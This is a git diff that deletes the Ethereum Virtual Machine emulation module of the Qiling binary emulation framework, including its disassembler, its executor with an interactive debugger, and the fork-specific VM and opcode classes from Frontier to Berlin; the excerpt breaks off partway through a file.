b/qiling/arch/evm/vm/disassembler.py deleted file mode 100644 index 805cc714c..000000000 --- a/qiling/arch/evm/vm/disassembler.py +++ /dev/null @@ -1,58 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework - -from .instruction import EVMInsn -from .utils import bytecode_to_bytes -from .opcodes import opcodes - - -class EVMDisasm: - def __init__(self) -> None: - self.current_mnemonic = None - self.current_pc = None - self.current_byte = None - self.current_imm_op = '' - - def disasm(self, code:bytes, hook_info): - result = {} - h = '' - pushcnt = 0 - pc = 0 - is_push = False - for item in code: - if pushcnt > 0: - h += hex(item)[2:].rjust(2, '0') - pushcnt -= 1 - if pushcnt == 0: - self.current_imm_op = '0x'+h - result[self.current_pc] = EVMInsn(self.current_pc, self.current_byte, self.current_mnemonic, self.current_imm_op, hook_info) - h = '' - is_push = False - elif item in opcodes: - self.current_mnemonic = opcodes[item].mnemonic - self.current_pc = pc - self.current_byte = hex(item) - if 0x60 <= item <= 0x7f: - is_push = True - pushcnt = item - 0x60 + 1 - - if not is_push: - result[self.current_pc] = EVMInsn(self.current_pc, self.current_byte, self.current_mnemonic, '', hook_info) - else: - self.current_pc = pc - self.current_byte = hex(item) - result[self.current_pc] = EVMInsn(self.current_pc, self.current_byte, 'Invalid', None, hook_info) - pc += 1 - # raise Exception("Invalid opcode: " + str(item)) - if h: - raise Exception("Not enough push bytes: " + h) - return result - - -if __name__ == '__main__': - hexcode='0x600035601c52' - code = bytecode_to_bytes(hexcode) - ret = EVMDisasm().disasm(code) - for k, v in ret.items(): - print(v.pc, v.byte, v.mnemonic, v.imm_op) \ No newline at end of file diff --git a/qiling/arch/evm/vm/evm.py b/qiling/arch/evm/vm/evm.py deleted file mode 100644 index 8310d493b..000000000 --- a/qiling/arch/evm/vm/evm.py +++ /dev/null @@ -1,90 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import sys -sys.path.append("..") - -import random -from eth_typing.evm import Address -from .forks import * -from .. import constants -from .vm import BaseVM -from .utils import bytecode_to_bytes, runtime_code_detector -from ..abi import QlArchEVMABI - -# Code name Release date Release block Opcode supported - -# Frontier 2015-07-30 0 Yes -# Ice Age 2015-09-08 200,000 - -# Homestead 2016-03-15 1,150,000 Yes -# DAO Fork (unplanned) 2016-07-20 1,920,000 - -# Tangerine Whistle (unplanned) 2016-10-18 2,463,000 Yes -# Spurious Dragon 2016-11-23 2,675,000 Yes -# Byzantium 2017-10-16 4,370,000 Yes -# Constantinople 2019-02-28 7,280,000 Yes -# Petersburg (unplanned) 2019-02-28 7,280,000 Yes -# Istanbul 2019-12-08 9,069,000 Yes -# Muir Glacier 2020-01-01 9,200,000 Yes -# Berlin TBD TBD Yes - - -father_VMs = { - constants.FRONTIER_FORK:FrontierVM, - constants.HOMESTEAD_FORK:HomesteadVM, - constants.TANGERINE_WHISTLE_FORK:TangerineWhistleVM, - constants.SPURIOUS_DRAGON_FORK:SpuriousDragonVM, - constants.BYZANTIUM_FORK:ByzantiumVM, - constants.CONSTANTINOPLE_FORK:ConstantinopleVM, - constants.PETERSBURG_FORK:PetersburgVM, - constants.ISTANBUL_FORK:IstanbulVM, - constants.MUIR_GLACIER_OFORK:MuirGlacierVM, - constants.BERLIN_FORK:BerlinVM -} - - -class QlArchEVMEmulator: - def __init__(self, ql, fork_name=constants.BERLIN_FORK) -> None: - self.ql = ql - self.abi = QlArchEVMABI() - try: - father_VM = father_VMs[fork_name] - vm = type('QlArchEVM', (father_VM,), dict()) - except: - raise ValueError('Fork name error') - - self.vm:BaseVM = vm(self.ql) - - def create_account(self, address:Address=None, balance:int=None): - if address is None: - address = random.randint(100, pow(2, 160)).to_bytes(20, 'little') - self.vm.state.touch_account(address) - if balance is not None: - self.vm.state.set_balance(address, balance) - - return address - - def create_message(self, - sender: Address, - to: Address = b'', - data: bytes = b'', - value: int = 0, - gas: int = 3000000, - gas_price: int = 1, - origin: Address = None, - code: bytes = b'', - code_address: Address = None, - contract_address: Address = None): - if code == b'' and not data: - code = self.ql.loader.code - if isinstance(data, str): - data = bytecode_to_bytes(data) - if isinstance(code, str): - code = bytecode_to_bytes(code) - if to != b'' and code == b'': - contract_code = self.vm.state.get_code(to) - code, _, _ = runtime_code_detector(contract_code) - code = bytecode_to_bytes(code) - - return self.vm.build_message(origin, gas_price, gas, to, sender, value, data, code, code_address, contract_address) diff --git a/qiling/arch/evm/vm/exec.py b/qiling/arch/evm/vm/exec.py deleted file mode 100644 index 883291261..000000000 --- a/qiling/arch/evm/vm/exec.py +++ /dev/null @@ -1,243 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from rich import print as rprint - -from qiling.const import QL_VERBOSE -from ..exceptions import Halt -from .logic.invalid import InvalidOpcode -from .computation import BaseComputation - - -def NO_RESULT(computation: BaseComputation) -> None: - """ - This is a special method intended for usage as the "no precompile found" result. - The type signature is designed to match the other precompiles. - """ - raise Exception("This method is never intended to be executed") - -class CMDHistory(list): - pass - -debug_cmd_history = CMDHistory() - -class EVMExecutor: - def __init__(self, - Computation:BaseComputation, - ) -> BaseComputation: - self.vm_context = Computation - self.disasm_dict = self.vm_context.disasm - self.opcode_lookup = self.vm_context.opcodes - self.is_debug = False - - # self.debug_cmd_history = [] - - def precompile_check(self): - # Early exit on pre-compiles - precompile = self.vm_context.precompiles.get(self.vm_context.msg.code_address, NO_RESULT) - if precompile is not NO_RESULT: - precompile(self.vm_context) - return True - return False - - def execute_once(self, opcode:int): - try: - pc = self.vm_context.code.pc - dis_insn = self.disasm_dict[pc] - opcode_fn = self.opcode_lookup[opcode] - - if dis_insn.is_hook_code: - for h in dis_insn.callback_list.hook_code_list: - h.call(self.vm_context.state.ql, self.vm_context) - if dis_insn.is_hook_insn: - for h in dis_insn.callback_list.hook_insn_list: - h.call(self.vm_context.state.ql, self.vm_context) - if dis_insn.is_hook_addr: - for h in dis_insn.callback_list.hook_addr_dict[pc]: - h.call(self.vm_context.state.ql, self.vm_context) - - except KeyError: - opcode_fn = InvalidOpcode(opcode) - - try: - if dis_insn: - # if self.is_debug: - # rprint(f'[{dis_insn.pc}] {hex(opcode)} {dis_insn.mnemonic} {dis_insn.imm_op}') - if self.vm_context.state.ql.verbose == QL_VERBOSE.DEBUG: - self.vm_context.state.ql.log.debug(f'[{dis_insn.pc}] {hex(opcode)} {dis_insn.mnemonic} {dis_insn.imm_op}') - - stack = [] - stack_output = 'stack ==> ' - - for i in self.vm_context._stack.values: - if i[0] is bytes: - stack.append('0x' + i[1].hex()) - elif i[0] is int: - stack.append(hex(i[1])) - else: - stack.append(i) - for i in stack: - stack_output += '\n\t\t'+i - - # if self.is_debug: - # rprint(' '+stack_output) - # if self.vm_context.state.ql.verbose == QL_VERBOSE.DEBUG: - # self.vm_context.state.ql.log.debug - rprint(' '+stack_output) - - opcode_fn(computation=self.vm_context) - - except Halt: - return True - - return False - - def execute(self, bp_list=[]) -> BaseComputation: - is_func_end = False - if not self.is_debug: - if self.precompile_check(): - return self.vm_context - - for opcode in self.vm_context.code: - pc = self.vm_context.code.pc - is_break = self.execute_once(opcode) - if self.is_debug: - if pc in bp_list: - break - - if is_break: - is_func_end = True - break - if self.is_debug: - return self.vm_context, is_func_end - return self.vm_context - - def execute_debug(self): - self.is_debug = True - bp_list = [] - - self.precompile_check() - - while True: - if debug_cmd_history and debug_cmd_history[-1] == 'c' and self.vm_context.msg.depth != 0: - cmd = 'c' - else: - cmd = input('[evm]> ') - debug_cmd_history.append(cmd) - - try: - if cmd == 'si': - try: - opcode = int.from_bytes(self.vm_context.code.read(1), byteorder='little') - is_break = self.execute_once(opcode) - if is_break: - break - except: - break - elif cmd == 'c': - _, is_func_end = self.execute(bp_list) - if is_func_end: - return self.vm_context - elif cmd.startswith('d'): - _, count = cmd.split(' ') - nums = int(count) - pc = self.vm_context.code.pc - res = {k: v for k,v in self.disasm_dict.items() if k >= pc} - index = 0 - for k, insn in res.items(): - if index >= nums+1: - break - rprint(f'[{insn.pc}] {insn.byte} {insn.mnemonic} {insn.imm_op}') - index += 1 - elif cmd == 'q': - # too violent - return self.vm_context - elif cmd.startswith('bp'): - _, addr = cmd.split(' ') - if addr.startswith('0x'): - addr = int(addr[2:], 16) - else: - addr = int(addr) - bp_list.append(addr) - elif cmd.startswith(('list', 'l')): - _, opt = cmd.split(' ') - if opt in ['breakpoint', 'bp']: - rprint(bp_list) - elif cmd.startswith(('info', 'i')): - def tohex(cmds, byte): - addr = None - if len(cmds) == 3: - addr = cmds[-1] - if addr: - rprint(self.hexdump(byte, start=int(addr))) - return - rprint(self.hexdump(byte)) - - res = cmd.split(' ') - opt = res[1] - if opt in ['bytecode', 'bc']: - code = ''.join(['%02X' % b for b in self.vm_context.msg.code]) - tohex(res, code) - - elif opt in ['memory', 'm']: - if len(res) == 3: - mem_bytes = self.vm_context.memory_read_bytes(int(res[-1]), 16*8) - else: - mem_bytes = self.vm_context.memory_read_bytes(0, 16*8) - mem = ''.join(['%02X' % b for b in mem_bytes]) - tohex(res, mem) - - else: - raise ValueError - except: - step_into = 'si: step into' - _continue = 'c: continue' - bp = 'bp [pc]: set breakpoint' - _list = 'list: \n\t\tlist bp: list all breakpoint' - rprint(f'[evm help]> \n\t{step_into}\n\t{_continue}\n\t{bp}\n\t{_list}') - continue - - - def hexdump(self, src, length=16, sep='.', minrows=8, start=0, prevsrc=""): - """ - @brief Return {src} in hex dump. - """ - txt = lambda c: chr(c) if 0x20 <= c < 0x7F else "." - - result = [] - result.append(' 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F | [ --ascii--]') - result.append('') - rows = [] - - for i in range(16): - subSrc = src[2 * (start * 16 + i * 16):2 * (start * 16 + i * 16) + length * 2] - hexa = '' - text = '' - if len(subSrc) > 0: - for h in range(0, len(subSrc), 2): - if h == length: - hexa += ' ' - byte = int(subSrc[h:h + 2], 16) - - # Check if it changed from op before - changed = False - if prevsrc is not None: - index = 2 * (start + i) * 16 + h - if index + 2 > len(prevsrc): - changed = True - elif int(prevsrc[index:index + 2], 16) != byte: - changed = True - - if changed: - hexa += "{:02x} ".format(byte) - else: - hexa += "{:02x} ".format(byte) - text += txt(byte) - - rows.append('{:08x}: {:<49} | {:<16} '.format(16 * (start + i), hexa, text)) - if len(rows) == minrows: - break - result.extend(rows) - return '\n'.join(result) \ No newline at end of file diff --git a/qiling/arch/evm/vm/execution_context.py b/qiling/arch/evm/vm/execution_context.py deleted file mode 100644 index f736053d3..000000000 --- a/qiling/arch/evm/vm/execution_context.py +++ /dev/null @@ -1,72 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from typing import ( - Iterable, -) - -from eth_typing import ( - Address, - BlockNumber, - Hash32, -) - -from ..abc import ExecutionContextAPI -from .._utils.generator import CachedIterable - - -class ExecutionContext(ExecutionContextAPI): - _coinbase = None - _timestamp = None - _number = None - _difficulty = None - _gas_limit = None - _prev_hashes = None - _chain_id = None - - def __init__( - self, - coinbase: Address, - timestamp: int, - block_number: BlockNumber, - difficulty: int, - gas_limit: int, - prev_hashes: Iterable[Hash32], - chain_id: int) -> None: - self._coinbase = coinbase - self._timestamp = timestamp - self._block_number = block_number - self._difficulty = difficulty - self._gas_limit = gas_limit - self._prev_hashes = CachedIterable(prev_hashes) - self._chain_id = chain_id - - @property - def coinbase(self) -> Address: - return self._coinbase - - @property - def timestamp(self) -> int: - return self._timestamp - - @property - def block_number(self) -> BlockNumber: - return self._block_number - - @property - def difficulty(self) -> int: - return self._difficulty - - @property - def gas_limit(self) -> int: - return self._gas_limit - - @property - def prev_hashes(self) -> Iterable[Hash32]: - return self._prev_hashes - - @property - def chain_id(self) -> int: - return self._chain_id diff --git a/qiling/arch/evm/vm/forks/__init__.py b/qiling/arch/evm/vm/forks/__init__.py deleted file mode 100644 index 7ee022d41..000000000 --- a/qiling/arch/evm/vm/forks/__init__.py +++ /dev/null @@ -1,10 +0,0 @@ -from .frontier import FrontierVM -from .homestead import HomesteadVM -from .tangerine_whistle import TangerineWhistleVM -from .spurious_dragon import SpuriousDragonVM -from .byzantium import ByzantiumVM -from .constantinople import ConstantinopleVM -from .petersburg import PetersburgVM -from .istanbul import IstanbulVM -from .muir_glacier import MuirGlacierVM -from .berlin import BerlinVM diff --git a/qiling/arch/evm/vm/forks/berlin/__init__.py b/qiling/arch/evm/vm/forks/berlin/__init__.py deleted file mode 100644 index b7d86639e..000000000 --- a/qiling/arch/evm/vm/forks/berlin/__init__.py +++ /dev/null @@ -1,10 +0,0 @@ -from ..muir_glacier import MuirGlacierVM -from .state import BerlinState - - -class BerlinVM(MuirGlacierVM): - # fork name - fork = 'berlin' - - # classes - _state_class = BerlinState diff --git a/qiling/arch/evm/vm/forks/berlin/computation.py b/qiling/arch/evm/vm/forks/berlin/computation.py deleted file mode 100644 index d51415bb0..000000000 --- a/qiling/arch/evm/vm/forks/berlin/computation.py +++ /dev/null @@ -1,20 +0,0 @@ -from ....vm.forks.muir_glacier.computation import ( - MUIR_GLACIER_PRECOMPILES -) -from ....vm.forks.muir_glacier.computation import ( - MuirGlacierComputation, -) - -from .opcodes import BERLIN_OPCODES - -BERLIN_PRECOMPILES = MUIR_GLACIER_PRECOMPILES - - -class BerlinComputation(MuirGlacierComputation): - """ - A class for all execution computations in the ``Berlin`` fork. - Inherits from :class:`~eth.vm.forks.muir_glacier.MuirGlacierComputation` - """ - # Override - opcodes = BERLIN_OPCODES - _precompiles = BERLIN_PRECOMPILES diff --git a/qiling/arch/evm/vm/forks/berlin/opcodes.py b/qiling/arch/evm/vm/forks/berlin/opcodes.py deleted file mode 100644 index 99a203d2c..000000000 --- a/qiling/arch/evm/vm/forks/berlin/opcodes.py +++ /dev/null @@ -1,19 +0,0 @@ -import copy -from typing import Dict - -from eth_utils.toolz import merge - -from ....vm.forks.muir_glacier.opcodes import ( - MUIR_GLACIER_OPCODES, -) -from ....vm.opcode import Opcode - - -UPDATED_OPCODES: Dict[int, Opcode] = { - # New opcodes -} - -BERLIN_OPCODES = merge( - copy.deepcopy(MUIR_GLACIER_OPCODES), - UPDATED_OPCODES, -) diff --git a/qiling/arch/evm/vm/forks/berlin/state.py b/qiling/arch/evm/vm/forks/berlin/state.py deleted file mode 100644 index e2e63b8af..000000000 --- a/qiling/arch/evm/vm/forks/berlin/state.py +++ /dev/null @@ -1,9 +0,0 @@ -from ....vm.forks.muir_glacier.state import ( - MuirGlacierState -) - -from .computation import BerlinComputation - - -class BerlinState(MuirGlacierState): - computation_class = BerlinComputation diff --git a/qiling/arch/evm/vm/forks/byzantium/__init__.py b/qiling/arch/evm/vm/forks/byzantium/__init__.py deleted file mode 100644 index 270e8cd8c..000000000 --- a/qiling/arch/evm/vm/forks/byzantium/__init__.py +++ /dev/null @@ -1,118 +0,0 @@ -# from typing import ( -# Type, -# ) - -# from eth_utils.toolz import ( -# curry, -# ) -# # from eth_bloom import ( -# # BloomFilter, -# # ) -# from eth_utils import ( -# encode_hex, -# ValidationError, -# ) - -# from ....abc import ( -# BlockAPI, -# BlockHeaderAPI, -# ComputationAPI, -# ReceiptAPI, -# SignedTransactionAPI, -# StateAPI, -# ) -# from ....constants import ( -# MAX_UNCLE_DEPTH, -# ) -# from ....validation import ( -# validate_lte, -# ) -from ..spurious_dragon import SpuriousDragonVM -# from ....vm.forks.frontier import make_frontier_receipt - -# from .blocks import ByzantiumBlock -# from .constants import ( -# EIP649_BLOCK_REWARD, -# EIP658_TRANSACTION_STATUS_CODE_FAILURE, -# EIP658_TRANSACTION_STATUS_CODE_SUCCESS, -# ) -# from .headers import ( -# create_byzantium_header_from_parent, -# configure_byzantium_header, -# compute_byzantium_difficulty, -# ) -from .state import ByzantiumState - - -# @curry -# def get_uncle_reward(block_reward: int, block_number: int, uncle: BlockHeaderAPI) -> int: -# block_number_delta = block_number - uncle.block_number -# validate_lte(block_number_delta, MAX_UNCLE_DEPTH) -# return (8 - block_number_delta) * block_reward // 8 - - -# EIP658_STATUS_CODES = { -# EIP658_TRANSACTION_STATUS_CODE_SUCCESS, -# EIP658_TRANSACTION_STATUS_CODE_FAILURE, -# } - - -class ByzantiumVM(SpuriousDragonVM): - # fork name - fork = 'byzantium' - - # classes - # block_class: Type[BlockAPI] = ByzantiumBlock - _state_class = ByzantiumState - -# # Methods -# create_header_from_parent = staticmethod(create_byzantium_header_from_parent) # type: ignore -# compute_difficulty = staticmethod(compute_byzantium_difficulty) # type: ignore -# configure_header = configure_byzantium_header -# # Separated into two steps due to mypy bug of staticmethod. -# # https://github.com/python/mypy/issues/5530 -# get_uncle_reward = get_uncle_reward(EIP649_BLOCK_REWARD) -# get_uncle_reward = staticmethod(get_uncle_reward) - -# @classmethod -# def validate_receipt(cls, receipt: ReceiptAPI) -> None: -# super().validate_receipt(receipt) -# if receipt.state_root not in EIP658_STATUS_CODES: -# raise ValidationError( -# "The receipt's `state_root` must be one of " -# f"[{encode_hex(EIP658_TRANSACTION_STATUS_CODE_SUCCESS)}, " -# f"{encode_hex(EIP658_TRANSACTION_STATUS_CODE_FAILURE)}]. Got: " -# f"{encode_hex(receipt.state_root)}" -# ) - -# @staticmethod -# def get_block_reward() -> int: -# return EIP649_BLOCK_REWARD - -# def add_receipt_to_header(self, -# old_header: BlockHeaderAPI, -# receipt: ReceiptAPI) -> BlockHeaderAPI: -# # Skip merkelizing the account data and persisting it to disk on every transaction. -# # Starting in Byzantium, this is no longer necessary, because the state root isn't -# # in the receipt anymore. -# # return old_header.copy( -# # bloom=int(BloomFilter(old_header.bloom) | receipt.bloom), -# # gas_used=receipt.gas_used, -# # ) -# pass - -# @staticmethod -# def make_receipt( -# base_header: BlockHeaderAPI, -# transaction: SignedTransactionAPI, -# computation: ComputationAPI, -# state: StateAPI) -> ReceiptAPI: - -# receipt_without_state_root = make_frontier_receipt(base_header, transaction, computation) - -# if computation.is_error: -# status_code = EIP658_TRANSACTION_STATUS_CODE_FAILURE -# else: -# status_code = EIP658_TRANSACTION_STATUS_CODE_SUCCESS - -# return receipt_without_state_root.copy(state_root=status_code) diff --git a/qiling/arch/evm/vm/forks/byzantium/computation.py b/qiling/arch/evm/vm/forks/byzantium/computation.py deleted file mode 100644 index 622421068..000000000 --- a/qiling/arch/evm/vm/forks/byzantium/computation.py +++ /dev/null @@ -1,32 +0,0 @@ -from eth_utils.toolz import ( - merge, -) - -from .... import precompiles -from ...._utils.address import ( - force_bytes_to_address, -) -from ....vm.forks.frontier.computation import FRONTIER_PRECOMPILES -from ....vm.forks.spurious_dragon.computation import SpuriousDragonComputation - -from .opcodes import BYZANTIUM_OPCODES - -BYZANTIUM_PRECOMPILES = merge( - FRONTIER_PRECOMPILES, - { - force_bytes_to_address(b'\x05'): precompiles.modexp, - force_bytes_to_address(b'\x06'): precompiles.ecadd, - force_bytes_to_address(b'\x07'): precompiles.ecmul, - force_bytes_to_address(b'\x08'): precompiles.ecpairing, - }, -) - - -class ByzantiumComputation(SpuriousDragonComputation): - """ - A class for all execution computations in the ``Byzantium`` fork. - Inherits from :class:`~eth.vm.forks.spurious_dragon.computation.SpuriousDragonComputation` - """ - # Override - opcodes = BYZANTIUM_OPCODES - _precompiles = BYZANTIUM_PRECOMPILES diff --git a/qiling/arch/evm/vm/forks/byzantium/constants.py b/qiling/arch/evm/vm/forks/byzantium/constants.py deleted file mode 100644 index 62b34d9d3..000000000 --- a/qiling/arch/evm/vm/forks/byzantium/constants.py +++ /dev/null @@ -1,12 +0,0 @@ -from eth_utils import denoms - -# -# Difficulty -# -BYZANTIUM_DIFFICULTY_ADJUSTMENT_CUTOFF = 9 - - -EIP649_BLOCK_REWARD = 3 * denoms.ether - -EIP658_TRANSACTION_STATUS_CODE_FAILURE = b'' -EIP658_TRANSACTION_STATUS_CODE_SUCCESS = b'\x01' diff --git a/qiling/arch/evm/vm/forks/byzantium/opcodes.py b/qiling/arch/evm/vm/forks/byzantium/opcodes.py deleted file mode 100644 index 5bb0789f2..000000000 --- a/qiling/arch/evm/vm/forks/byzantium/opcodes.py +++ /dev/null @@ -1,136 +0,0 @@ -import copy -import functools -from typing import Dict - -from eth_utils.toolz import merge - -from typing import ( - Any, - Callable, -) - -from .... import constants - -from ....abc import OpcodeAPI -from ....exceptions import ( - WriteProtection, -) -from ....vm import mnemonics -from ....vm import opcode_values -from ....vm.computation import BaseComputation -from ....vm.forks.tangerine_whistle.constants import ( - GAS_CALL_EIP150, - GAS_SELFDESTRUCT_EIP150 -) -from ....vm.logic import ( - call, - context, - logging, - storage, - system, -) -from ....vm.opcode import as_opcode - -from ....vm.forks.spurious_dragon.opcodes import SPURIOUS_DRAGON_OPCODES - - -def ensure_no_static(opcode_fn: Callable[..., Any]) -> Callable[..., Any]: - @functools.wraps(opcode_fn) - def inner(computation: BaseComputation) -> Callable[..., Any]: - if computation.msg.is_static: - raise WriteProtection("Cannot modify state while inside of a STATICCALL context") - return opcode_fn(computation) - return inner - - -UPDATED_OPCODES = { - opcode_values.REVERT: as_opcode( - logic_fn=system.revert, - mnemonic=mnemonics.REVERT, - gas_cost=constants.GAS_ZERO, - ), - # - # Context - # - opcode_values.RETURNDATASIZE: as_opcode( - logic_fn=context.returndatasize, - mnemonic=mnemonics.RETURNDATASIZE, - gas_cost=constants.GAS_BASE, - ), - opcode_values.RETURNDATACOPY: as_opcode( - logic_fn=context.returndatacopy, - mnemonic=mnemonics.RETURNDATACOPY, - gas_cost=constants.GAS_VERYLOW, - ), - # - # Call - # - opcode_values.STATICCALL: call.StaticCall.configure( - __name__='opcode:STATICCALL', - mnemonic=mnemonics.STATICCALL, - gas_cost=GAS_CALL_EIP150, - )(), - opcode_values.CALL: call.CallByzantium.configure( - __name__='opcode:CALL', - mnemonic=mnemonics.CALL, - gas_cost=GAS_CALL_EIP150, - )(), - # - # Logging - # - opcode_values.LOG0: as_opcode( - logic_fn=ensure_no_static(logging.log0), - mnemonic=mnemonics.LOG0, - gas_cost=constants.GAS_LOG, - ), - opcode_values.LOG1: as_opcode( - logic_fn=ensure_no_static(logging.log1), - mnemonic=mnemonics.LOG1, - gas_cost=constants.GAS_LOG, - ), - opcode_values.LOG2: as_opcode( - logic_fn=ensure_no_static(logging.log2), - mnemonic=mnemonics.LOG2, - gas_cost=constants.GAS_LOG, - ), - opcode_values.LOG3: as_opcode( - logic_fn=ensure_no_static(logging.log3), - mnemonic=mnemonics.LOG3, - gas_cost=constants.GAS_LOG, - ), - opcode_values.LOG4: as_opcode( - logic_fn=ensure_no_static(logging.log4), - mnemonic=mnemonics.LOG4, - gas_cost=constants.GAS_LOG, - ), - # - # Create - # - opcode_values.CREATE: system.CreateByzantium.configure( - __name__='opcode:CREATE', - mnemonic=mnemonics.CREATE, - gas_cost=constants.GAS_CREATE, - )(), - # - # Storage - # - opcode_values.SSTORE: as_opcode( - logic_fn=ensure_no_static(storage.sstore), - mnemonic=mnemonics.SSTORE, - gas_cost=constants.GAS_NULL, - ), - # - # Self Destruct - # - opcode_values.SELFDESTRUCT: as_opcode( - logic_fn=ensure_no_static(system.selfdestruct_eip161), - mnemonic=mnemonics.SELFDESTRUCT, - gas_cost=GAS_SELFDESTRUCT_EIP150, - ), -} - - -BYZANTIUM_OPCODES: Dict[int, OpcodeAPI] = merge( - copy.deepcopy(SPURIOUS_DRAGON_OPCODES), - UPDATED_OPCODES, -) diff --git a/qiling/arch/evm/vm/forks/byzantium/state.py b/qiling/arch/evm/vm/forks/byzantium/state.py deleted file mode 100644 index b4f078c7a..000000000 --- a/qiling/arch/evm/vm/forks/byzantium/state.py +++ /dev/null @@ -1,7 +0,0 @@ -from ....vm.forks.spurious_dragon.state import SpuriousDragonState - -from .computation import ByzantiumComputation - - -class ByzantiumState(SpuriousDragonState): - computation_class = ByzantiumComputation diff --git a/qiling/arch/evm/vm/forks/constantinople/__init__.py b/qiling/arch/evm/vm/forks/constantinople/__init__.py deleted file mode 100644 index 222b8506f..000000000 --- a/qiling/arch/evm/vm/forks/constantinople/__init__.py +++ /dev/null @@ -1,10 +0,0 @@ -from ..byzantium import ByzantiumVM -from .state import ConstantinopleState - - -class ConstantinopleVM(ByzantiumVM): - # fork name - fork = 'constantinople' - - # classes - _state_class = ConstantinopleState diff --git a/qiling/arch/evm/vm/forks/constantinople/computation.py b/qiling/arch/evm/vm/forks/constantinople/computation.py deleted file mode 100644 index c6f177a7e..000000000 --- a/qiling/arch/evm/vm/forks/constantinople/computation.py +++ /dev/null @@ -1,30 +0,0 @@ -from ....vm.forks.byzantium.computation import ( - BYZANTIUM_PRECOMPILES -) -from ....vm.forks.byzantium.computation import ( - ByzantiumComputation -) -from ....vm.gas_meter import ( - allow_negative_refund_strategy, - GasMeter, -) - -from .opcodes import CONSTANTINOPLE_OPCODES - -CONSTANTINOPLE_PRECOMPILES = BYZANTIUM_PRECOMPILES - - -class ConstantinopleComputation(ByzantiumComputation): - """ - A class for all execution computations in the ``Constantinople`` fork. - Inherits from :class:`~eth.vm.forks.byzantium.computation.ByzantiumComputation` - """ - # Override - opcodes = CONSTANTINOPLE_OPCODES - _precompiles = CONSTANTINOPLE_PRECOMPILES - - def get_gas_meter(self) -> GasMeter: - return GasMeter( - self.msg.gas, - allow_negative_refund_strategy - ) diff --git a/qiling/arch/evm/vm/forks/constantinople/constants.py b/qiling/arch/evm/vm/forks/constantinople/constants.py deleted file mode 100644 index dffeccd87..000000000 --- a/qiling/arch/evm/vm/forks/constantinople/constants.py +++ /dev/null @@ -1,12 +0,0 @@ -from eth_utils import denoms - - -GAS_EXTCODEHASH_EIP1052 = 400 -GAS_SSTORE_EIP1283_NOOP = 200 -GAS_SSTORE_EIP1283_INIT = 20000 -GAS_SSTORE_EIP1283_CLEAN = 5000 -GAS_SSTORE_EIP1283_CLEAR_REFUND = 15000 -GAS_SSTORE_EIP1283_RESET_CLEAR_REFUND = 19800 -GAS_SSTORE_EIP1283_RESET_REFUND = 4800 - -EIP1234_BLOCK_REWARD = 2 * denoms.ether diff --git a/qiling/arch/evm/vm/forks/constantinople/opcodes.py b/qiling/arch/evm/vm/forks/constantinople/opcodes.py deleted file mode 100644 index bb5372d59..000000000 --- a/qiling/arch/evm/vm/forks/constantinople/opcodes.py +++ /dev/null @@ -1,69 +0,0 @@ -import copy -from eth_utils.toolz import ( - merge -) - -from .... import ( - constants -) -from ....vm import ( - mnemonics, - opcode_values, -) -from ....vm.forks.byzantium.opcodes import ( - BYZANTIUM_OPCODES, - ensure_no_static -) -from ....vm.forks.constantinople.constants import ( - GAS_EXTCODEHASH_EIP1052 -) -from ....vm.forks.constantinople.storage import ( - sstore_eip1283, -) -from ....vm.logic import ( - arithmetic, - context, - system, -) -from ....vm.opcode import ( - as_opcode -) - - -UPDATED_OPCODES = { - opcode_values.SHL: as_opcode( - logic_fn=arithmetic.shl, - mnemonic=mnemonics.SHL, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SHR: as_opcode( - logic_fn=arithmetic.shr, - mnemonic=mnemonics.SHR, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.SAR: as_opcode( - logic_fn=arithmetic.sar, - mnemonic=mnemonics.SAR, - gas_cost=constants.GAS_VERYLOW, - ), - opcode_values.EXTCODEHASH: as_opcode( - logic_fn=context.extcodehash, - mnemonic=mnemonics.EXTCODEHASH, - gas_cost=GAS_EXTCODEHASH_EIP1052, - ), - opcode_values.CREATE2: system.Create2.configure( - __name__='opcode:CREATE2', - mnemonic=mnemonics.CREATE2, - gas_cost=constants.GAS_CREATE, - )(), - opcode_values.SSTORE: as_opcode( - logic_fn=ensure_no_static(sstore_eip1283), - mnemonic=mnemonics.SSTORE, - gas_cost=constants.GAS_NULL, - ), -} - -CONSTANTINOPLE_OPCODES = merge( - copy.deepcopy(BYZANTIUM_OPCODES), - UPDATED_OPCODES, -) diff --git a/qiling/arch/evm/vm/forks/constantinople/state.py b/qiling/arch/evm/vm/forks/constantinople/state.py deleted file mode 100644 index dac9c78c7..000000000 --- a/qiling/arch/evm/vm/forks/constantinople/state.py +++ /dev/null @@ -1,9 +0,0 @@ -from ....vm.forks.byzantium.state import ( - ByzantiumState -) - -from .computation import ConstantinopleComputation - - -class ConstantinopleState(ByzantiumState): - computation_class = ConstantinopleComputation diff --git a/qiling/arch/evm/vm/forks/constantinople/storage.py b/qiling/arch/evm/vm/forks/constantinople/storage.py deleted file mode 100644 index 007907635..000000000 --- a/qiling/arch/evm/vm/forks/constantinople/storage.py +++ /dev/null @@ -1,16 +0,0 @@ -from functools import partial - -from ....vm.logic.storage import ( - net_sstore, - NetSStoreGasSchedule, -) - -GAS_SCHEDULE_EIP1283 = NetSStoreGasSchedule( - base=200, - create=20000, - update=5000, - remove_refund=15000, -) - - -sstore_eip1283 = partial(net_sstore, GAS_SCHEDULE_EIP1283) diff --git a/qiling/arch/evm/vm/forks/frontier/__init__.py b/qiling/arch/evm/vm/forks/frontier/__init__.py deleted file mode 100644 index 12fb2b0c7..000000000 --- a/qiling/arch/evm/vm/forks/frontier/__init__.py +++ /dev/null @@ -1,10 +0,0 @@ -from ...vm import BaseVM -from .state import FrontierState - -class FrontierVM(BaseVM): - # fork name - fork: str = 'frontier' # noqa: E701 # flake8 bug that's fixed in 3.6.0+ - - # classes - _state_class = FrontierState - diff --git a/qiling/arch/evm/vm/forks/frontier/computation.py b/qiling/arch/evm/vm/forks/frontier/computation.py deleted file mode 100644 index 17e66cb4d..000000000 --- a/qiling/arch/evm/vm/forks/frontier/computation.py +++ /dev/null @@ -1,108 +0,0 @@ -from ...exec import EVMExecutor -from ...debug import run_debugger -from .... import precompiles -from ....constants 